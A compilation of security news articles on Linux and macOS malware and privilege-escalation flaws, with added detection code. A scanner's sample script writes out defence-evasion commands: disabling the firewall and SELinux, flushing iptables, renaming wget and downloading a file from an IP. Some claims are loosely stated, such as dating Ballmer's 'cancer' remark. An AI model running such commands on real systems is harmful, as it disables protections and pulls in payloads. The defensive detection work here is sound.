
Malicious Linux Shell Scripts Used to Evade Defenses

 

Attackers' evasive methods stretch back to the times when base64 and other popular encoding schemes were utilized. 

Attackers today are using new Linux shell-script methods and techniques to deactivate firewalls, disable monitoring agents, and change access control lists (ACLs). The common evasive shell-script techniques are:

1. Uninstalling monitoring agents
Monitoring agents are software components that regularly track the system's process and network activity. They also produce various logs, which are useful during an incident investigation.

The malicious script, discovered in the osquery-based sandbox, attempts to uninstall the cloud-related monitoring agent Aegis (the Alibaba Cloud threat detection agent) and terminate the Aliyun service. It also tries to uninstall YunJing, a host security agent from Tencent, and the BCM client management agent, which is generally installed on endpoints for risk mitigation.

2. Disabling Firewalls and Interrupts
Most systems and servers employ firewalls as a defensive measure. As a defense evasion technique, the malicious software attempts to deactivate the firewall, i.e., Uncomplicated Firewall (ufw). In addition, attackers delete the iptables rules (iptables -F); iptables is commonly used on Linux computers and servers for controlling firewall rules.

The scripts also contain commands that deactivate the non-maskable interrupt (NMI) watchdog. The watchdog is a configurable timer mechanism that raises an interrupt when a certain condition and time are met. In the case of a system freeze, the NMI watchdog interrupt handler would stop the process that caused the freeze. To get around this defense, attackers disable the watchdog feature using the sysctl command, or disable it temporarily by setting the value to '0'.

3. Disabling Linux Security Modules (LSMs)
The malicious shell script also disables security components such as SELinux and AppArmor. These modules are used to enforce mandatory access control (MAC) policies. A server administrator can easily configure them to give users restricted access to the system's installed or running programs.

- AppArmor: AppArmor is a Linux security feature that allows users to lock down apps such as Firefox for added protection. In Ubuntu's default setup, a user can restrict a program by granting it limited permissions.

- SELinux: SELinux is a Linux security feature that allows a security administrator to apply a security context to certain apps and services. On various web servers the shell is blocked or limited, so attackers seeking RCE (Remote Code Execution) generally bypass or disable it.

4. Modifying ACLs
ACLs, or Access Control Lists, contain the rules for granting rights on files and utilities. Filesystem ACLs tell the operating system which users are authorized to access the system and what rights they possess. In Linux, the setfacl program is used to change and remove ACLs.

5. Changing Attributes
In Linux, the chattr command is used to set and unset various attributes of a file. Attackers use it to protect their own dropped files or to make their files permanent so that a user can't delete them.

6. Renaming common utilities
In one of the malicious scripts, common utilities such as wget and curl were used under different names. These programs are often used to fetch files from a remote IP address, and attackers use them to download malicious files from C2.

If wget and curl are used under different names, some security systems that track the exact names of the utilities may not trigger on the download event.
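The six techniques above can be flagged statically when triaging a suspect script. The scanner below is an added example, not code from the original post or from Uptycs; the rule labels, the command forms it matches, the agent keywords (taken from the names in the text) and the sample script are all constructed for illustration. It also follows renamed copies of wget and curl so that a later download under the new name is still reported.

```python
import os
import re
import shlex

# Technique 1: an agent name from the text plus a stop/remove verb (assumed keywords).
AGENTS = re.compile(r"aegis|aliyun|yunjing|\bbcm", re.I)
REMOVAL = re.compile(r"uninstall|\b(stop|disable|kill|pkill|killall|rm)\b", re.I)

# Techniques 2-5: one pattern per behaviour described in the list above.
PATTERNS = [
    ("2-firewall", re.compile(r"\bufw\s+disable\b|\biptables\b.*\s(-F|--flush)\b")),
    ("2-nmi-watchdog", re.compile(r"nmi_watchdog\s*=\s*0|echo\s+0\s*>\s*\S*nmi_watchdog")),
    ("3-lsm", re.compile(r"\bsetenforce\s+0\b|SELINUX\s*=\s*disabled"
                         r"|\b(stop|disable)\b.*\bapparmor\b", re.I)),
    ("4-acl", re.compile(r"\bsetfacl\b")),
    ("5-attributes", re.compile(r"\bchattr\s+[-+]\w*[ia]")),
]
DOWNLOADERS = {"wget", "curl"}


def split_commands(line):
    """Split a line on ; && || | (naive: does not honour quoting)."""
    return [c for c in re.split(r"\s*(?:;|&&|\|\|?)\s*", line) if c]


def tokens(cmd):
    try:
        return shlex.split(cmd, comments=True)
    except ValueError:            # unbalanced quotes in a hostile script
        return cmd.split()


def scan_script(text):
    """Return [(line_no, technique, command)] for every rule hit."""
    findings, aliases = [], {}    # aliases: new name -> original utility
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for cmd in split_commands(line):
            argv = tokens(cmd)
            if not argv:
                continue
            prog = os.path.basename(argv[0])
            if AGENTS.search(cmd) and REMOVAL.search(cmd):
                findings.append((lineno, "1-monitoring-agent", cmd))
            for label, pattern in PATTERNS:
                if pattern.search(cmd):
                    findings.append((lineno, label, cmd))
            # Technique 6: remember copies/moves of wget or curl ...
            if prog in ("mv", "cp", "ln"):
                paths = [a for a in argv[1:] if not a.startswith("-")]
                if len(paths) == 2 and os.path.basename(paths[0]) in DOWNLOADERS:
                    aliases[os.path.basename(paths[1])] = os.path.basename(paths[0])
                    findings.append((lineno, "6-renamed-utility", cmd))
            # ... and report any later command run under the new name.
            elif prog in aliases:
                findings.append((lineno, "6-download-via-alias:" + aliases[prog], cmd))
    return findings


# Constructed sample input (203.0.113.10 is a documentation address).
SAMPLE = """\
#!/bin/bash
ufw disable
iptables -F
sysctl -w kernel.nmi_watchdog=0
setenforce 0
systemctl stop apparmor; systemctl disable apparmor
systemctl stop aliyun.service
setfacl -b /tmp/workdir
mv /usr/bin/wget /usr/bin/wd1
cp /usr/bin/curl /usr/bin/cd1
wd1 -q http://203.0.113.10/file -O /tmp/workdir/run
chattr +ia /tmp/workdir/run
ls -la /tmp
"""

if __name__ == "__main__":
    for lineno, technique, cmd in scan_script(SAMPLE):
        print(f"line {lineno:2}: {technique:28} {cmd}")
```

Name-based matching of this kind is exactly what technique 6 is meant to defeat at runtime, which is why the alias table matters; on a live host the same idea applies to file hashes or inode tracking rather than names.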

EDR Detections by Uptycs
Uptycs EDR detected these malicious scripts with a threat level of 10/10 using YARA process scanning.

As attackers employ more complex and novel evasion techniques, it is more vital than ever to track and record what is happening on the system. According to Threatpost, the following is recommended:

- Regularly monitor suspicious processes, events, and network traffic that result from the execution of any untrusted binary.
- Keep your systems and firmware up to date with the most recent fixes and releases.

LemonDuck Targets Windows and Linux Systems

 

LemonDuck was initially mainly a cryptocurrency-mining botnet, but it was later transformed into a malware loader, bringing us to Microsoft's current update on this malevolent digital duck loaded with citrus.

Microsoft warns users that LemonDuck's crypto-mining malware is aimed at both Windows and Linux, and that it spreads through phishing, exploits, USB devices, and brute-force attacks, as well as attacks that exploit a serious Exchange Server vulnerability detected in March.

In May, two years after the first bug appeared, the organization was found to be employing Exchange bugs for cryptocurrency mining.

Notably, throughout the period where security teams concentrate on correcting severe faults, and even eradicating competing spyware, the group behind LemonDuck makes use of high-profile weaknesses to protect the security system. 

The repercussions of a LemonDuck attack may be grave. According to Microsoft, LemonDuck's capabilities include the theft of key Windows and Linux PC credentials; the removal of security controls, which leaves the system defenseless; spreading via email (probably spearphishing attempts); and reinstallation on devices to facilitate further remote code execution (RCE) through backdoors.

Malware research teams from Cisco's Talos have also scoped the group's Exchange activity. They observed that before loading payloads such as the Cobalt Strike pentesting kit, a popular lateral movement tool, LemonDuck was using automated tools to scan, detect, and exploit server software, which allows the malware to download additional modules.

Microsoft's post on the matter says, "(LemonDuck) uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others — and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using Covid-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems."

Microsoft also revealed that although the attackers initially focused predominantly on China, India is now in the top ten countries most afflicted by this malware. Specifically, India is among the six top countries targeted by cybercriminals alongside the USA, Russia, China, Germany, and Great Britain, with production and IoT businesses being the main targets.

The risk is also heightened by the expanding malware architecture, which makes the cybersecurity sector even more vulnerable to these attacks. 

The usage of LemonCat, a distinct yet equally harmful and highly developed focused malware tool often used to install backdoors in systems through RCE attacks, is also mentioned by Microsoft. 

Further, Microsoft’s threat intelligence team states, “The threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks."

New Windows and Linux Flaws: Provide Attackers Highest System Privileges

 

Two new vulnerabilities, one in Windows and the other in Linux, were discovered on Tuesday, allowing hackers with a presence in a vulnerable machine to circumvent OS security limits and access critical resources. 

Microsoft's Windows 10 and upcoming Windows 11 versions have been discovered to be vulnerable to a new local privilege escalation vulnerability that allows users with low-level permissions to access Windows system files, permitting them to decrypt private keys and uncover the operating system installation password. The vulnerability has been named "SeriousSAM".

CERT Coordination Center (CERT/CC) stated in a vulnerability note published, "Starting with Windows 10 build 1809, non-administrative users are granted access to SAM, SYSTEM, and SECURITY registry hive files. This can allow for local privilege escalation (LPE)." 

The operating system configuration files in question are as follows - 

c:\Windows\System32\config\sam 
c:\Windows\System32\config\system 
c:\Windows\System32\config\security 

Microsoft acknowledged the vulnerability, which has been assigned the number CVE-2021-36934, but has yet to offer a patch or provide a timeframe for when a fix will be released.

The Windows maker explained, "An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights."

However, successful exploitation of the issue requires that the attacker has already gained a foothold and is able to execute code on the target machine. In the meantime, users should restrict access to the sam, system, and security files and delete VSS shadow copies of the system disk, according to CERT/CC.

Since the release of Patch Tuesday updates on July 13, this is also the third publicly documented unpatched issue in Windows. Apart from CVE-2021-36934, two other vulnerabilities in the Print Spooler component have been identified, leading Microsoft to advise all users to halt and terminate the service to protect their computers from exploitation. 

"Sequoia" privilege escalation flaw affected Linux distros:

Remediations have been issued for a security shortcoming affecting all Linux kernel versions from 2014 that can be exploited by malicious users and malware already deployed on a system to gain root-level privileges. 

The vulnerability, nicknamed "Sequoia" by Qualys researchers, has been issued the identifier CVE-2021-33909 and affects default Ubuntu 20.04, Ubuntu 20.10, Ubuntu 21.04, Debian 11, and Fedora 34 Workstation installations. The issue also affects Red Hat Enterprise Linux versions 6, 7, and 8. 

The vulnerability is a size_t-to-int type conversion flaw in the Linux kernel's "seq_file" filesystem interface, which allows an unprivileged local attacker to generate, install, and delete a deep directory structure with a total path length of more than 1GB, resulting in a privilege escalation on the vulnerable host.

According to Qualys, unprivileged attackers could use a stack exhaustion denial-of-service vulnerability in the system (CVE-2021-33910) to corrupt the software suite and induce a kernel panic.

Cybercriminals Unleashing Malware for Apple M1 Chip

 

Apple Macs are becoming more popular in the workplace, and the number of malware variants targeting macOS is increasing as well. However, the M1, Apple's new system-on-a-chip, has produced a new generation of macOS-specific malware that anti-malware tools, threat hunters, and researchers must swiftly learn to recognize and, eventually, fight. Historically, most macOS malware has been reused from Windows malware variants. But as employees set up home offices during the pandemic's shift to work-from-home, more Macs entered the industry, making them a more valuable target for attackers targeting enterprises.

Apple's new ARM64-based microprocessor, the M1, has already witnessed an increase in malware types created expressly for it, according to Mac security specialist Patrick Wardle. "As attackers evolve and change their ways, we as malware analysts and security researchers need to stay abreast of that as well." In 2020, around half of all macOS malware, such as adware and nation-state attack code, may have migrated from Windows or Linux.

M1 offers faster and more efficient processing, graphics, and battery life, and is now available in Apple's new Macs and iPad Pro. It also has several new built-in security mechanisms, such as one that protects the computer from remote exploitation and another that protects physical access. 

According to a recent Malwarebytes survey, Windows malware detections are down 24% among business users, while Mac malware detections are up 31%. Wardle discovered in his research that when he separated the binaries for macOS malware into two categories, one for Intel-based Macs and the other for M1-based Macs, anti-malware systems detected the Intel-based malware more successfully than the M1-based malware, despite the fact that the binaries are "logically the same." 

For the M1 malware, their detection rate dropped by 10%. That's a clue, he says, that existing antivirus signatures are mostly for the Intel edition of the macOS malware, rather than the M1 variant. Because static analysis alone can fail, detections should also use behavior-based technology. 

It's a matter of honing malware analysts' and threat hunters' skills to the new Apple silicon, he says. With reverse-engineering abilities and an awareness of the ARM64 instruction set, he says he wants to "empower Mac analysts, red teams, and everyone in cybersecurity." Wardle says, "The M1 system actually does significantly improve security at the hardware level, but it's transparent to the everyday user."

GitHub Releases Key Findings of an Easy-to-Exploit Linux flaw

 

Kevin Backhouse, a researcher at GitHub Security Lab, revealed the details of an easy-to-exploit Linux flaw that can be used to escalate privileges to root on the targeted system. The vulnerability, classified as highly critical and tracked as CVE-2021-3560, affects polkit, a system service installed by default on many Linux distributions.

On Thursday, Kevin published a blog post explaining his findings, as well as a short video detailing the exploit in polkit. A local, unprivileged attacker can use the flaw to escalate privileges to root with only a few commands executed in the terminal. 

Security researchers have acknowledged that the vulnerability, CVE-2021-3560, impacts some versions of Red Hat Enterprise Linux, Fedora, Debian, and Ubuntu. On June 3, a patch for CVE-2021-3560 was released.

“The bug I found was quite old. It was introduced seven years ago in commit bfa5036 and first shipped with polkit version 0.113. However, many of the most popular Linux distributions didn’t ship the vulnerable version until more recently,” Backhouse stated.

“The bug has a slightly different history on Debian and its derivatives (such as Ubuntu) because Debian uses a fork of polkit with a different version numbering scheme. In the Debian fork, the bug was introduced in commit f81d021 and first shipped with version 0.105-26. The most recent stable release of Debian, Debian 10 (“buster”), uses version 0.105-25, which means that it isn’t vulnerable,” Backhouse further added.

Polkit is a system service developed for controlling system-wide privileges, creating a way for non-privileged processes to communicate with privileged processes. Backhouse described it as a service that plays the role of a judge, determining whether an action initiated by a user — specifically one that requires higher privileges — can be carried out directly or requires additional authorization, such as entering a password.

The vulnerability identified by the researcher is easy to exploit, requiring just a few commands in the terminal. However, due to some timing requirements, it normally takes a few attempts for the exploit to succeed.

CVE-2021-3560 allows an unprivileged local hacker to gain root privileges. It’s very simple and quick to exploit, so users must update their installations as quickly as possible. Any system that has polkit version 0.113 (or later) installed is vulnerable. That includes popular distributions such as RHEL 8 and Ubuntu 20.04.

Linux System Service Bug Allows You to Gain Root Access

 

An authentication bypass vulnerability in the polkit auth system service, which is installed by default on many recent Linux distributions, allows unprivileged attackers to gain a root shell. On June 3, 2021, the polkit local privilege escalation flaw (CVE-2021-3560) was officially identified, and a fix was released. Polkit is used by systemd, hence it's included in any Linux distribution that uses systemd. 

Kevin Backhouse, a GitHub security researcher, detailed how he discovered the bug (CVE-2021-3560) in a systemd service called polkit in a blog post on Thursday. The problem, which was first introduced in commit bfa5036 seven years ago and first shipped in polkit version 0.113, took various pathways in different Linux distributions. Despite the fact that many Linux distributions did not ship with the vulnerable polkit version until recently, any Linux machine with polkit 0.113 or later installed is vulnerable to attacks. 

Polkit, formerly known as PolicyKit, is a service that determines whether certain Linux tasks require more privileges than there are currently available. It comes into play when you want to establish a new user account, for example. According to Backhouse, exploiting the issue is shockingly simple, needing only a few commands utilizing common terminal tools such as bash, kill, and dbus-send. 

"The vulnerability is triggered by starting a dbus-send command but killing it while polkit is still in the middle of processing the request," explained Backhouse. Killing dbus-send, an interprocess communication command, in the middle of an authentication request causes an error: polkit asks for the UID of a connection that no longer exists (because the connection was killed).

"In fact, polkit mishandles the error in a particularly unfortunate way: rather than rejecting the request, it treats the request as though it came from a process with UID 0," explains Backhouse. "In other words, it immediately authorizes the request because it thinks the request has come from a root process."

Because polkit's UID query to the dbus-daemon occurs numerous times throughout different code paths, this doesn't happen all of the time. According to Backhouse, those code pathways usually handle the error correctly, but one is vulnerable, and if the disconnection occurs while that code path is running, privilege escalation occurs. It's all about timing, which varies in unanticipated ways due to the involvement of various processes. Backhouse believes the bug's intermittent nature is why it went unnoticed for seven years.
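The error-handling mistake Backhouse describes can be shown with a small model. This is an added example, not polkit's code: the toy bus, the function names, the connection name and the idea that the UID variable is pre-set to 0 before the lookup are all assumptions made for illustration. It contrasts a check that ignores the failed lookup (fail open) with one that rejects the request (fail closed).

```python
class NameHasNoOwner(Exception):
    """Toy bus error: the sender's connection is already gone."""


class ToyBus:
    """Stand-in for the message bus: maps connection names to caller UIDs."""

    def __init__(self):
        self._uids = {}

    def connect(self, name, uid):
        self._uids[name] = uid

    def disconnect(self, name):
        self._uids.pop(name, None)

    def get_connection_uid(self, name):
        if name not in self._uids:
            raise NameHasNoOwner(name)
        return self._uids[name]


def lookup_uid(bus, sender):
    """Return (ok, uid). On error the uid keeps its initial value of 0,
    which happens to be root's UID (assumed mechanism for this model)."""
    uid = 0
    try:
        uid = bus.get_connection_uid(sender)
    except NameHasNoOwner:
        return False, uid
    return True, uid


def check_fail_open(bus, sender):
    """Flawed path: the error flag is dropped, so a vanished caller looks like root."""
    _ok, uid = lookup_uid(bus, sender)
    return "authorized" if uid == 0 else "challenge"


def check_fail_closed(bus, sender):
    """Hardened path: a failed lookup rejects the request outright."""
    ok, uid = lookup_uid(bus, sender)
    if not ok:
        return "rejected"
    return "authorized" if uid == 0 else "challenge"


def handle_request(check, caller_uid, disconnect_early):
    """Model one request; disconnect_early simulates the caller being killed
    while the request is still being processed."""
    bus = ToyBus()
    sender = ":1.96"              # constructed connection name
    bus.connect(sender, caller_uid)
    if disconnect_early:
        bus.disconnect(sender)
    return check(bus, sender)


if __name__ == "__main__":
    for check in (check_fail_open, check_fail_closed):
        for early in (False, True):
            result = handle_request(check, 1000, early)
            print(f"{check.__name__:18} disconnected={early!s:5} -> {result}")
```

In the model only the fail-open check turns the disconnected UID 1000 caller into an authorized one, which matches the single vulnerable code path described above.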

Linux, MacOS Malware Hidden in Fake Browserify NPM Package

 

Over the weekend, Sonatype's automated malware detection system spotted a serious and unusual malware sample published to the NPM registry. NodeJS developers working with Linux and Apple macOS operating systems were targeted by a brand-new malicious package identified on the NPM (Node Package Manager) registry. The malicious package, named "web-browserify", imitates the well-known Browserify NPM component, which has been downloaded more than 160 million times over its lifecycle, with over 1.3 million weekly downloads on NPM alone, and is used by 356,000 GitHub repositories.

The malicious component was downloaded around 50 times before it was removed from NPM within two days of its publication. The package, made by a pseudonymous author claiming to be Steve Jobs, bundles many legitimate open-source components and performs extensive surveillance on an infected system. Moreover, up to this point, none of the main antivirus engines had been able to detect the ELF malware contained within the component. The fact that it uses genuine software applications to perform suspicious activities could be one of the reasons.

Browserify's fame comes from being an open-source JavaScript tool that lets developers write cross-platform, NodeJS-style modules that compile for use in the browser. The difference between the authentic Browserify and the fake one is that the latter abuses legitimate NPM components, bundling them inside a malicious, hard-to-notice Linux and Mac executable.

The malicious bundle includes a manifest file, package.json, a postinstall.js script, and an ELF executable called "run" shipped in a compressed archive, run.tar.xz, inside the npm component. When a developer installs the package, the scripts extract and start the "run" Linux binary from the archive, which requests elevated or root permissions from the user. The extracted "run" binary is huge, around 120 MB in size, and bundles hundreds of legitimate NPM components inside itself. The malware is made entirely from open-source components and uses these genuine components to carry out its extensive surveillance activities.

The cross-platform “sudo-prompt” module is one of these components and is used by "run" to prompt the user into granting the malware root privileges on both macOS and Linux distributions.

Google Issues a Warning about Spectre Attacks using JavaScript

 

It's been a long time since researchers uncovered a pair of security vulnerabilities, known as Spectre and Meltdown, that revealed fundamental flaws in how most modern PC processors handle data to maximize efficiency. While they affect an astronomical number of computing devices, the so-called speculative execution bugs are generally hard to exploit in practice. Now, however, researchers from Google have built a proof-of-concept that shows the risk Spectre attacks pose to the browser, in hopes of motivating a new generation of defenses.

In 2018, Google detailed two variants of Spectre, one of which, named variant 1 (CVE-2017-5753), concerned JavaScript exploitation against browsers. Google released the PoC so that web application developers can understand why it is critical to deploy application-level mitigations. At a high level, as detailed in a Google document on W3C, a developer's "data must not unexpectedly enter an attacker's process".

While the PoC demonstrates the JavaScript Spectre attack against Chrome 88's V8 JavaScript engine on an Intel Core i7-6500U 'Skylake' CPU on Linux, Google notes it can easily be adapted for other CPUs, browser versions, and operating systems. It was even successful on Apple's M1 Arm CPU with minor modifications. The attack can leak data at a rate of 1kB per second. The chief components of the PoC are a Spectre version 1 "device", or code that triggers attacker-controlled transient execution, and a side-channel, or "a way to observe side effects of the transient execution".

"The web platform relies on the origin as a fundamental security boundary, and browsers do a pretty good job at preventing explicit leakage of data from one origin to another," explained Google's Mike West. "Attacks like Spectre, however, show that we still have work to do to mitigate implicit data leakage. The side-channels exploited through these attacks prove that attackers can read any data which enters a process hosting that attackers' code. These attacks are quite practical today, and pose a real risk to users."

Google has likewise released another prototype Chrome extension called Spectroscope that scans an application to discover assets that may require enabling additional defenses.

A Trio of Vulnerabilities in the Linux Kernel Can Give Attackers Root Privileges

 

Linux distributions appear to be susceptible to recently uncovered kernel vulnerabilities. Three vulnerabilities unearthed in the kernel's iSCSI module, which is used for accessing shared data storage, would give administrative privileges to anybody with a user account. The trio of defects (CVE-2021-27363, CVE-2021-27364, and CVE-2021-27365) had gone unidentified in the Linux code since 2006, until GRIMM researchers found them.

“If you already had the execution on a box, either because you have a user account on the machine, or you’ve compromised some service that doesn’t have repaired permissions, you can do whatever you want basically,” said Adam Nichols, principal of the Software Security practice at GRIMM. 

The vulnerabilities are in code that is not reachable remotely, so they are not remote exploits, but they are still troubling. They take “any existing threat that might be there. It just makes it that much worse,” he explained. Referring to the concept that "many eyes make any bug shallow," Linux code does not get so many eyes that it becomes perfect. The bugs have been there since the code was first published, and they haven't really changed in the last fifteen years.

GRIMM researchers are trying to dig in, where possible, to see how often such vulnerabilities occur, which is much more feasible with open source. That the defects slipped through has a lot to do with the size of the Linux kernel. "It's gotten so big," Nichols said, "there's so much code there." “The real strategy is making sure you’re loading as little code as possible.”

Nichols said that the bugs are present in all Linux distributions, but the kernel drivers are not enabled by default. Whether a regular user can load the vulnerable kernel module may vary. GRIMM was able to check this on all Red Hat distros, for example. "Even though it's not loaded by default, you can load it and you can exploit it without any trouble," added Nichols.

Although the hardware is present, other systems such as Debian and Ubuntu “are in the same boat as Red Hat, where the user, depending on what packages are installed, can coerce it into getting loaded; then it’s there to be exploited,” he said. Errors are reported in 5.11.4, 5.10.21, 5.4.103, 4.19.179, 4.14.224, 4.9.260, and 4.4.260. The bugs are not included in the following updates. However, all the old kernels are end-of-life and will not be patched.

Nichols suggests blacklisting the kernel module as a temporary measure to neutralize the defects. “Any system that doesn’t use that module can just say never load this module under any circumstances, and then you’re kept safe,” he said. But “if you’re actually using iSCSI, then you wouldn’t want to do that.”

Ezuri Crypter Being Used to Evade Antivirus Detection

 

According to a report published by AT&T Alien Labs, various cybercriminals are using the Ezuri crypter to pack their malware and dodge antivirus detection. Although Windows malware has been known to use similar tactics, cybercriminals are now using Ezuri to penetrate Linux systems too. Written in Golang, Ezuri acts as both a crypter and a loader for ELF (Linux) binaries. It encrypts the malware code using AES and, on decryption, executes the malicious payload directly in memory without writing any files to disk.

Systems engineer and Ezuri's creator, Guilherme Thomazi Bonicontro ('guitmz'), open-sourced the ELF loader on GitHub in 2019 and introduced the tool in a blog post. In an email interview with, Bonicontro, also known as TMZ, shared that he is a malware researcher and builds research tools to spread awareness and aid defenders.

“I'm an independent malware researcher, I do this as one of my leisure activities. The objective of my work is just to learn and bring awareness on assorted PoC assault and defense techniques, yet never bring on any harm. As a general guideline, I generally share samples of my ventures with antivirus organizations and I never discharge code with ruinous payload or anything with refined replication capabilities. I believe knowledge ought to be available to everybody and every individual ought to be answerable for their own activities to rest soundly at night,” said Bonicontro. 

Researchers Ofer Caspi and Fernando Martinez of AT&T Alien Labs noted that after decrypting the AES-encrypted payload, Ezuri immediately passes the resulting code to the runFromMemory function as an argument, without dropping malware files anywhere on the infected system. During the last few months, Caspi and Martinez identified several malware authors that pack their samples with Ezuri. These include the cybercrime group TeamTnT, active since at least April 2020.

TeamTnT is known to attack misconfigured Docker instances and exposed APIs to turn vulnerable systems into DDoS bots and crypto miners. Later variants of TeamTnT's malware, such as "Black-T", which installs network scanners on infected systems and extracts AWS credentials from memory, were likewise found to be packed with Ezuri. According to the AT&T researchers, "the last Black-T sample distinguished by Palo Alto Networks Unit42 is really an Ezuri loader." The researchers also noticed the presence of the 'ezuri' string in numerous Ezuri-packed binaries.

Malware samples that were typically detected by about 50% of antivirus engines on VirusTotal yielded 0 detections when encrypted with Ezuri, at the time of AT&T's research. Even today, the Ezuri-packed sample has less than a 5% detection rate on VirusTotal.

'InterPlanetary Storm' Botnet Now Targeting MAC and IoT Devices


First discovered in 2019, the InterPlanetary Storm malware has resurfaced with a new variant targeting Mac and Android along with Windows and Linux machines, as per the findings by researchers at IT security firm, Barracuda Networks.

The malware is known as ‘InterPlanetary Storm’ because it uses the InterPlanetary File System (IPFS) peer-to-peer (p2p) network. Using a legitimate p2p network makes the malicious traffic difficult to identify because it is intermixed with legitimate traffic. The malware targets Windows machines and lets the attacker execute arbitrary PowerShell code on the compromised systems.

“The malware detects the CPU architecture and running OS of its victims, and it can run on ARM-based machines, an architecture that is quite common with routers and other IoT devices,” the researchers noted.

The earlier versions of the InterPlanetary Storm malware that surfaced in May 2019 compromised Windows-based devices; by June 2019, however, the botnet could also infect Linux machines. The new versions with add-on capabilities attempt to infect machines via a dictionary attack, a form of brute-force attack that involves breaking into a password-protected system by systematically guessing passwords. The most recent version, detected in August, is configured to infect Macs along with IoT devices such as televisions running the Android OS, as per a report published on Thursday by Barracuda Networks.

In the report, Erez Turjeman, a researcher with Barracuda, says, "The malware detects the CPU architecture and running OS of its victims, and it can run on ARM-based machines, an architecture that is quite common with routers and other [internet of things] devices." "The malware is called InterPlanetary Storm because it uses the InterPlanetary File System (IPFS) p2p network and its underlying libp2p implementation," the report further notes.

"This allows infected nodes to communicate with each other directly or through other nodes (i.e., relays)."

The malware was found building a botnet that has infected approximately 13,000 devices in 84 different countries worldwide including the U.S., Brazil, Europe, and Canada. However, the majority of targets were based in Asia, constituting a total of 64%. Infections found in South Korea, Taiwan, and Hong Kong amounted to a total of 59%. Russia and Ukraine accounted for 8% of the total, and the United States and Canada for 5%. China and Sweden accounted for 3% each.

Golang: A Cryptomining Malware that May Be Targeting Your PC


Cybersecurity experts at Barracuda Networks have discovered a unique kind of crypto mining malware called "Golang." The malware can attack Windows as well as Linux systems, according to the experts. This latest malware is targeting Monero cryptocurrency with the help of Xmrig, a popular miner. The number of attacks related to the malware may be relatively low, but the cybersecurity experts have discovered 7 IP addresses associated with this malware, all originating from China.


The experts also observed that the Golang malware's primary targets are non-HTTP services like MSSQL and Redis, app servers, and web app frameworks, whereas easy-to-attack targets like end-users are safe. Earlier versions of Golang only affected Linux systems; the present version targets both Windows and Linux. The attacks are carried out using various exploits targeting IoT devices, Hadoop, Drupal, ElasticSearch, and Oracle Weblogic. For instance, in a recent malware attack in China, the malware used exploits that targeted the ThinkPHP app framework, which is widely used in the country.

According to the experts, the Golang malware is capable of evolving every day, using more exploits as each day passes. The malware works by infiltrating the system and, once inside, using the files it requires to complete its task. Depending on the platform, these may include downloaded update scripts, configuration files, a scanner, and a miner. When attacking Windows, the hackers can use backdoors too. In recent times, more and more hackers have shifted towards using Golang, as it can't be identified by anti-virus software.

The malware is infamous for targeting vulnerable servers, making it appealing to cybercriminals looking for vulnerabilities to exploit. The only way to be safe from this malware is to keep track of CPU usage (watching for when it goes unusually high) and to observe any suspicious activity at the endpoints. Any threat similar to Golang can be avoided by vigilant inspections and immediate responses. Awareness about crypto mining threats is also a must.
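The CPU-tracking advice above can be made concrete by computing utilisation from successive `/proc/stat` readings and alerting only when it stays high for several intervals in a row, which separates a miner from a short burst. This is an added example, not code from the original article or from Barracuda; the threshold, interval count and sample readings are assumptions constructed for illustration.

```python
# Added example: flag sustained high CPU utilisation from /proc/stat samples.

# Constructed samples of the aggregate "cpu" line, one per polling interval.
# Fields: user nice system idle iowait irq softirq steal (clock ticks).
SAMPLES = [
    "cpu  1000 0 500 8500 0 0 0 0",
    "cpu  1100 0 550 9350 0 0 0 0",   # mostly idle interval
    "cpu  2050 0 550 9400 0 0 0 0",   # busy
    "cpu  3000 0 550 9450 0 0 0 0",   # busy
    "cpu  3950 0 550 9500 0 0 0 0",   # busy
    "cpu  4050 0 600 10350 0 0 0 0",  # back to idle
]

def read_cpu_line(path="/proc/stat"):
    """Return the aggregate cpu line of a live Linux system."""
    with open(path) as fh:
        return fh.readline().strip()

def parse_cpu_line(line):
    """Return (total_ticks, idle_ticks) for an aggregate cpu line."""
    fields = line.split()
    if len(fields) < 5 or fields[0] != "cpu":
        raise ValueError("not an aggregate cpu line: %r" % line)
    # Only the first 8 counters: guest time is already included in user.
    values = [int(v) for v in fields[1:9]]
    idle = values[3] + (values[4] if len(values) > 4 else 0)  # idle + iowait
    return sum(values), idle

def utilisation(samples):
    """Busy fraction per interval; None where counters went backwards."""
    result = []
    if len(samples) < 2:
        return result
    prev = parse_cpu_line(samples[0])
    for line in samples[1:]:
        cur = parse_cpu_line(line)
        d_total, d_idle = cur[0] - prev[0], cur[1] - prev[1]
        if d_total <= 0 or d_idle < 0:   # reboot or counter reset
            result.append(None)
        else:
            result.append((d_total - d_idle) / d_total)
        prev = cur
    return result

def sustained_high(util, threshold=0.9, min_intervals=3):
    """Return (start_index, length) for each run of high utilisation."""
    runs, start = [], None
    for i, value in enumerate(util + [None]):   # sentinel closes a final run
        high = value is not None and value >= threshold
        if high and start is None:
            start = i
        elif not high and start is not None:
            if i - start >= min_intervals:
                runs.append((start, i - start))
            start = None
    return runs

if __name__ == "__main__":
    print(sustained_high(utilisation(SAMPLES)))
```

On a live host, collect `read_cpu_line()` at a fixed interval and feed the list to `utilisation()`; correlate any reported run with the process list before acting on it.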

Can open source software be bought?


Open-source software (OSS) is released under a special license that makes its source code available to the user to inspect, use, modify and enhance. It is a common misunderstanding that such software is not copyrighted; in fact, it is copyrighted under a license that lets its users study, change and use its source code or services (depending upon the software) for commercial use. Some of the common open-source software projects are Linux, Red Hat, Ubuntu, GitHub, FreeBSD, and Fedora.


Just five years ago the tech world was quite critical and skeptical of open-source software, with Microsoft CEO Steve Ballmer calling Linux a 'cancer' and open-source software 'a communist threat', but OSS has since come a long way with the success of Red Hat and Linux. Open source has given a silver lining to underdog developers and defied the monopoly of tech giants, giving small businesses and individuals the power to grow using open-source code.

